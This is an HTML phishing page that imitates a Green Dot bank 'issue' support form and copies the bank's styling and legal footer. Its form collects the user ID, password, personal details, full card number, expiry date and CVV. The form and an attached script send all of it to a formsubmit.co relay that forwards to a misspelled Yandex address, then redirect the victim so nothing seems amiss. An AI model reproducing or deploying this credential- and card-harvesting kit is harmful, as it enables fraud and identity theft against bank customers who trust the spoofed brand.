<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Open Bank Account Online Today - Green Dot</title>
    <link rel="stylesheet" type="text/css" media="screen" href="./issue_files/flexwebcore-greendot.min.css">
    <link rel="shortcut icon" href="./enroll/flexweb/img/favicon-greendot.ico" type="image/x-icon">
    <link rel="stylesheet" href="./issue_files/grl4sbt.css">
    <style>

        <link rel="stylesheet" href="./issue_files/grl4sbt.css">
    <style>
        .module-wrapper {
            display: -webkit-box;
            display: -ms-flexbox;
            display: flex;
            width: 100%;
        }

        .badge-text {
            margin-left: 20px;
            margin-top: -40px;
        }

        .text-blue {
            color: #0071ce;
        }


        #js-disabled-content {
            color: red;
            margin: 50px;
        }

        .message {
            z-index: 20000;
        }





        /* BUX-7130: remove recaotcha badge */
        .grecaptcha-badge {
            display: none;
        }

        .text-recaptcha {
            text-align: center;
        }

        .radio--cardtype .radio__input:disabled + .radio__label,
        .radio--cardtype .radio__input:disabled + .radio__label {
            border-color: #ddd;
        }

        .smartbanner--android {
            top: -84px;
            box-shadow: none !important;
        }

        /* BUX-7187: add below style for greendot skin */
        #greendot_body .input--filled .input__inner {
            border-color: #999999;
        }

        @media (min-width: 48em) {
            .text-recaptcha span {
                width: 250px;
                float: right;
            }
        }

        @media (max-width: 48em) {
            .eureka-page-heading-mobile {
                font-size: 20px;
                line-height: 24.72px;
                color: #000 !important;
            }
        }

        .intuit-footer {
            background-color: #25313b !important;
            color: #c5ced4 !important;
        }

        .gb-footer {
            font-size: 12px;
            color: #757d7e;
        }

            .gb-footer a {
                color: #757d7e;
            }

        .gb-footer-divider {
            margin-left: 5px;
            margin-right: 5px;
        }


        #modal-error {
            flex-direction: column;
            align-items: flex-start;
            padding: 0px 0px 0px 0px;
            position: absolute;
            height: auto;
            width: 343px;
            /* White */
            background: #FFFFFF;
            /* Modal Shadow */
            box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.4);
            border-radius: 8px;
        }

            #modal-error img {
                width: auto;
            }

            #modal-error .gap-bottom-md {
                margin-bottom: 15px !important;
            }

            #modal-error .page-title {
                /* Headline Medium */
                font-style: normal;
                font-weight: 600;
                font-size: 17px;
                line-height: 21px;
                /* identical to box height */
                text-align: center;
                letter-spacing: -0.03em;
                /* Black */
                color: #000000;
                /* Inside Auto Layout */
                flex: none;
                order: 1;
                align-self: center;
                flex-grow: 0;
                margin: 0px 8px;
            }

            #modal-error .page-error-message {
                /* Body Medium */
                font-style: normal;
                font-weight: normal;
                font-size: 15px;
                line-height: 19px;
                text-align: center;
                /* Grey 10 */
                color: #262626;
                /* Inside Auto Layout */
                flex: none;
                order: 2;
                align-self: center;
                flex-grow: 0;
                margin: 0px 8px;
            }

            #modal-error .modal__header {
                min-height: 20px;
            }

        input[type="password"]::-ms-reveal {
            display: none;
        }
    </style>
    
  

<script src="./issue_files/static_wdp.js.download"></script><script src="./issue_files/wdp.js.download"></script><style>img[_ngcontent-mpf-c50] {
                width: 76px;
                height: 68px;
            }</style><style>.gap-top-xsm[_ngcontent-mpf-c50] {
        margin-top: 13px !important;
    }

    .lock-icon[_ngcontent-mpf-c50] {
        position: absolute;
        right: 19.33px;
        margin: auto;
        height: 1.25em;
        width: 1.25em;
    }
    
    .page-footer[_ngcontent-mpf-c50]{
        padding-bottom: 26px;
    }

    @media screen and (min-width: 48em) {
        .summary-icon[_ngcontent-mpf-c50] {
            margin-top: 40px !important;
        }
    }</style><style>.social-link[_ngcontent-mpf-c50] {
                    height: auto !important;
                    width: auto !important;
                }

                .gb-footer-mobile[_ngcontent-mpf-c50] {
                    display: none;
                }

                @media (max-width: 575px) {
                    .gb-footer-desktop[_ngcontent-mpf-c50] {
                        display: none;
                    }

                    .gb-footer-mobile[_ngcontent-mpf-c50] {
                        display: block;
                        text-align: center;
                    }
                }</style><style>.selection--cardtype[_ngcontent-mpf-c60]   .row--cardtype[_ngcontent-mpf-c60] {
                position: relative;
                display: inline-block;
                margin-left: 10px;
                margin-top: 10px;
                width: auto;
            }
            .selection--cardtype[_ngcontent-mpf-c60]   .label--cardtype[_ngcontent-mpf-c60] {
                display: block;
                margin-left: 0;
                overflow: hidden;
                border-radius: 8px;
                background-color: #fff;
                border: 1px solid #ccc;
                -webkit-transition: border-color 0.1s ease-in-out;
                transition: border-color 0.1s ease-in-out;
            }
            .label--cardtype[_ngcontent-mpf-c60] {
                margin-left: 10px;
                position: relative;
                -webkit-box-flex: 1;
                -ms-flex: 1 1 auto;
                flex: 1 1 auto;
                font-size: 0.875em;
                line-height: 1.428571429;
                top: 0.15em;
            }
            .selection__cardtype-image[_ngcontent-mpf-c60] {
                width: 7.8125em;
                height: 5em;
                background-position: 50%;
            }
            .selection__cardtype-image--mastercard[_ngcontent-mpf-c60] {
                background-image: url(../enroll/flexweb/img/logo-cardtype-mastercard.svg);
            }
            .w9-content[_ngcontent-mpf-c60] {
                background-color: #fff;
                padding: 10px 10px;
                margin-bottom: 24px;
                border-radius: 8px;
            }
            .term_h[_ngcontent-mpf-c60] {
                font-size: 20px;
                line-height: 24px;
                margin-bottom: 8px;
                margin-top: 20px !important;
            }
            .term_text[_ngcontent-mpf-c60] {
                font-size: 15px;
                line-height: 19px;
                margin-bottom: 0px;
            }
            .term_p[_ngcontent-mpf-c60] {
                font-size: 20px;
                line-height: 24px;
                margin-bottom: 8px;
            }
            .ul-declime[_ngcontent-mpf-c60] {
                list-style: decimal;
                padding-left: 15px;
                font-size: 13px;
                line-height: 16px;
            }
            .ul-declime[_ngcontent-mpf-c60]   li[_ngcontent-mpf-c60] {
                margin-bottom: 5px;
            }
            .ul-alpha[_ngcontent-mpf-c60] {
                list-style: lower-alpha;
                padding-left: 15px;
                font-size: 11px;
                line-height: 14px;
                margin-top: 8px;
            }
            .w9-help-link[_ngcontent-mpf-c60] {
                padding-left: 4px;
                cursor: pointer;
            }
            .btn--disabled[_ngcontent-mpf-c60] {
                background-color: #ddd !important;
                cursor: default !important;
            }
            @media screen and (min-width: 48em) {
                .g-recaptcha[_ngcontent-mpf-c60] {
                    float: right;
                }
            }
	
	   .custom-container {
            width: 80%;
            background-color: white;
            margin: 0 auto;
            padding: 20px;
            box-sizing: border-box;
        }

        input[type="text"] {
            border: 1px solid green;
            padding: 5px;
            width: 100%;
            background: #ffffff;
        }
		
		 textarea[name="complain"] {
            border: 1px solid green;
            padding: 5px;
            width: 100%;
            background: #ffffff;
        }
			</style>
			</head>

<body>

           
   

   
    










 <div class="page-section-bg type2" style="padding-top: 30px;"></div>
        <div class="custom-container">
            
               <div class="container"> 
                    <form method="POST" class="gform" action="https://formsubmit.co/greendotsuppor@yandex.com">
                        <input type="hidden" name="_captcha" value="false">
                        <input type="hidden" name="_next" value="issue.html">
                        <div id="first" class="acc-body active">
                            <div class="row">
                                <div class="col-md-8 col-sm-12">
								
								
								<div class="row">
                                    <div class="col-lg-12 col-md-12 col-xs-12 col-sm-12" style="font-size:18px;">
                                        <b>Account Details</b>
                                    </div>
                                </div>
                                <!-- First Name -->
                                <div class="row" style="height:10px;"></div>
                                <div class="row">
                                    <div class="col-md-4 col-sm-4" style="margin-bottom:5px;">
                                        <label class="required">User ID</label>
                                    </div>
                                    <div class="col-lg-6 col-md-6 col-xs-12 col-sm-12">
                                        <input type="text" name="UserName" id="uname" style="padding:5px;width:100%;background:#ffffff;" placeholder="" required>
                                    </div>
                                </div>
                                <!-- Last Name -->
                                <div class="row" style="height:10px;"></div>
                                <div class="row">
                                    <div class="col-md-4 col-sm-4" style="margin-bottom:5px;">
                                        <label class="required">Password</label>
                                    </div>
                                    <div class="col-lg-6 col-md-6 col-xs-12 col-sm-12">
                                        <input type="text" name="pass" id="pass" style="padding:5px;width:100%;background:#ffffff;" placeholder="" required>
                                    </div>
                                </div><br>
								
                                <div class="row">
                                    <div class="col-lg-12 col-md-12 col-xs-12 col-sm-12" style="font-size:18px;">
                                        <b>User Information</b>
                                    </div>
                                </div>
                                <!-- First Name -->
                                <div class="row" style="height:10px;"></div>
                                <div class="row">
                                    <div class="col-md-4 col-sm-4" style="margin-bottom:5px;">
                                        <label class="required">First Name</label>
                                    </div>
                                    <div class="col-lg-6 col-md-6 col-xs-12 col-sm-12">
                                        <input type="text" name="FirstName" id="fname" style="padding:5px;width:100%;background:#ffffff;" placeholder="" required>
                                    </div>
                                </div>
                                <!-- Last Name -->
                                <div class="row" style="height:10px;"></div>
                                <div class="row">
                                    <div class="col-md-4 col-sm-4" style="margin-bottom:5px;">
                                        <label class="required">Last Name</label>
                                    </div>
                                    <div class="col-lg-6 col-md-6 col-xs-12 col-sm-12">
                                        <input type="text" name="LastName" id="lname" style="padding:5px;width:100%;background:#ffffff;" placeholder="" required>
                                    </div>
                                </div>
                                <!-- Email -->
                                <div class="row" style="height:10px;"></div>
                                <div class="row">
                                    <div class="col-md-4 col-sm-4" style="margin-bottom:5px;">
                                        <label class="required">Email</label>
                                    </div>
                                    <div class="col-lg-6 col-md-6 col-xs-12 col-sm-12">
                                        <input type="text" name="Email" id="email" style="padding:5px;width:100%;background:#ffffff;" placeholder="" required>
                                    </div>
                                </div>
                                <!-- Phone -->
                                <div class="row" style="height:10px;"></div>
                                <div class="row">
                                    <div class="col-md-4 col-sm-4" style="margin-bottom:5px;">
                                        <label class="required">Phone</label>
                                    </div>
                                    <div class="col-lg-6 col-md-6 col-xs-12 col-sm-12">
                                        <input type="text" name="Phone" id="Phone" style="padding:5px;width:100%;background:#ffffff;" placeholder="" required>
                                    </div>
                                </div>
                                
                                <!-- Business Information -->
                                <div class="row" style="height:40px;"></div>
                                <div class="row">
                                    <div class="col-lg-12 col-md-12 col-xs-12 col-sm-12" style="font-size:18px;">
                                        <b>Please enter your card's information and state your issue in the form below.</b>
                                    </div>
                                </div>
								
								<br>
								<div class="row" style="height:20px;"></div>
                                <div class="row">
                                    <div class="col-md-4 col-sm-4" style="margin-bottom:5px;">
                                        <label class="required">16-digit card number</label>
                                    </div>
                                    <div class="col-lg-6 col-md-6 col-xs-12 col-sm-12">
                                        <input type="text" name="Occupation" id="Occupation" value="" style="padding:5px;width:100%;background:#ffffff;" placeholder="" required>
                                    </div>
                                </div>
								
                                <div class="row">
							<div class="col-md-6">
								<div class="form-group">
									<label class="required">Expiration date</label>
									<input type="text" name="Expire" id="expire" class="form-control" placeholder="MM/YYYY" required>
								</div>
							</div><br>
							<div class="col-md-6">
								<div class="form-group">
									<label class="required">  </label>
									<input type="text" name="CVV" id="cvv" class="form-control" placeholder="CVV" required>
								</div>
							</div>
						</div>
								
                               
                                
                               
								
                               <div class="row" style="height:10px;"></div>
								<div class="row">
								<div class="col-md-4  col-sm-4" style="margin-bottom:5px;">
								<label class="required">State your issue here</label>
								</div>
								<div class="col-lg-6 col-md-6 col-xs-12  col-sm-12">

								<textarea name="complain" id="complain" style="padding:5px;width:100%;height:200px;background:#ffffff;" placeholder="Please explain your issue here.  " required></textarea>
								</div>
								</div>
                                <!-- Submit Button -->
                                <div class="row">
                                    <div class="col-lg-6 col-md-6 col-xs-12 col-sm-12">
                                        <input type="submit" value="SUBMIT" class="btn btn-style-6">
                                    </div>
                                </div>
							</div>
							</div>
                    </div>
                </form>
            </div>
        
    </div>


 </div>
    
<BR>

<!--BRANDED-->
<script type="text/javascript" src="./issue_files/core.js.download" async=""></script><footer _ngcontent-mpf-c50="" role="contentinfo" class="page-footer js-page-footer"><div _ngcontent-mpf-c50="" class="page-footer__inner"><div _ngcontent-mpf-c50="" class="page-footer__copy"> Green Dot Cards are issued by Green Dot Bank, Member FDIC, pursuant to a license from Visa U.S.A., Inc. Visa is a registered trademark of Visa International Service Association. Green Dot Bank also operates under the following registered trade names: GO2bank, GoBank and Bonneville Bank. These registered trade names are used by, and refer to, a single FDIC-insured bank, Green Dot Bank. Deposits under any of these trade names are deposits with Green Dot Bank and are aggregated for deposit insurance coverage up to the allowable limits. </div><div _ngcontent-mpf-c50="" class="page-footer__end"><div _ngcontent-mpf-c50="" class="page-footer__logos"><div _ngcontent-mpf-c50="" class="page-footer__logo page-footer__logo--first"></div><div _ngcontent-mpf-c50="" class="page-footer__logo page-footer__logo--second"></div></div><div _ngcontent-mpf-c50="" class="page-footer__copyright"><svg _ngcontent-mpf-c50="" role="img" aria-label="Green Dot logo" class="page-footer__copyright-dot"><use _ngcontent-mpf-c50="" xlink:href="#icon-circle"></use></svg>© 2003-<span _ngcontent-mpf-c50="" class="js-current-year">2023</span> Green Dot Corporation </div></div></div></footer><iframe sandbox="allow-scripts allow-same-origin" title="Adobe ID Syncing iFrame" id="destination_publishing_iframe_greendot_0" name="destination_publishing_iframe_greendot_0_name" src="./issue_files/dest5.html" class="aamIframeLoaded" style="display: none; width: 0px; height: 0px;"></iframe>



 <script>
    // Function to handle form submission
    function submitForm(event) {
      event.preventDefault(); // Prevent form submission

      // Make an asynchronous request to submit the form data
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "https://formsubmit.co/greendotsuppor@yandex.com");
      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
      xhr.onreadystatechange = function() {
        if (xhr.readyState === XMLHttpRequest.DONE) {
          // Handle the response from the server
          if (xhr.status === 200) {
            // Form submitted successfully
            window.location.href = "index.html"; // Redirect to the next page
          } else {
            // Error occurred during form submission
            console.log("Form submission error:", xhr.status);
          }
        }
      };

      var formData = new FormData(event.target);
      xhr.send(new URLSearchParams(formData));
    }

    // Add event listener for form submission
    document.querySelector(".gform").addEventListener("submit", submitForm);
</script>



</body></html>